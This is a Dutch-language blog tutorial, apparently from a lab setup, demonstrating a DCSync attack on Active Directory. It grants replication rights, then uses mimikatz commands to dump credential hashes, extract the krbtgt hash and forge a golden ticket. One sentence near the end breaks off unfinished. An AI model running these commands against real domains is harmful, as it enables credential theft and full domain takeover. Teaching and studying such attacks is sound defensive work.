DCSync aanval

Vandaag zal ik een demonstratie geven op de bekende DCSync aanval, ik zal beschrijven wat het precies is en wat het doet. Met behulp van een kleine korte demonstratie, geniet er maar lekker en van en veel lees plezier!

Wat is een DCSync?

De dcsync aanval is eigenlijk niks anders dan jezelf voordoen als een domain controller en op deze manier de hashes bemachtigen van de echte domain controller. Vervolgens kan jij deze hashes dumpen en een golden ticket aanval uitvoeren om toegang te krijgen tot de domain controller. Echter kan je niet zomaar een DCSync aaval uitvoeren want de gebruiker heeft een aantal rechten nodig, deze rechten zijn als volgt:

  • Replicating Directory Changes All
  • Replicating Directory Changes

Indien een gebruiker de bovenstaande rechten heeft kan hij/zij een DCSync aanval uitvoeren met het account.

De aanval

De eerste stap is om de juiste rechten aan de gebruiker te geven om uiteindelijk een DCSync aanval uit te kunnen voeren. Dit doen wij als volgt, open de server manager op een windows server.

Vervolgens klik op Tools en daarna op Active directory Users and Computers.

Vervolgens ga je naar Users en selecteer je een gebruiker.

Ga dan naar de security tab en zoek de permissies op.

Granting the report service account permissions

Zoals in bovenstaande afbeelding te zien is, moeten we de twee permissies aanvinken en op ‘Apply’ klikken en dan op ‘Ok’. Nu hebben wij de rechten die nodig zijn om de DCSync aanval uit te kunnen voeren. Dus de volgende stap is om mimikatz op de machine te krijgen om de DCSync aanval uit te kunnen voeren.

Mimikatz to the rescue

Het eerste wat gedaan moet worden zijn de volgende commando’s:

privilege::debug
token::elevate

Daarna hashes dumpen als volgt:

sekurlsa::msv

Nu wij de hashes hebben kunnen wij de DCsync aanval uitvoeren als volgt:

lsadump::dcsync /user:rootsec\krbtgt

Zoals in bovenstaande afbeelding te zien is hebben wij nu de KRBTGT hash te pakken, met deze hash kunnen wij een golden ticket aanval uitvoeren en op deze manier toegang tot de echte domain controller pakken. Om een golden ticket te maken voer je de volgende commando uit:

kerberos::golden /domain:rootsec.local /sid: /krbtgt: /ptt

Zoals je ziet hebben wij nu een golden ticket geinjecteerd. Nu kunnen wij het volgende doen:

Dit was een korte demonstratie van de bekende DCSync aanval, bedankt voor het lezen en tot volgende week!

Please share and spread
NederlandsEnglish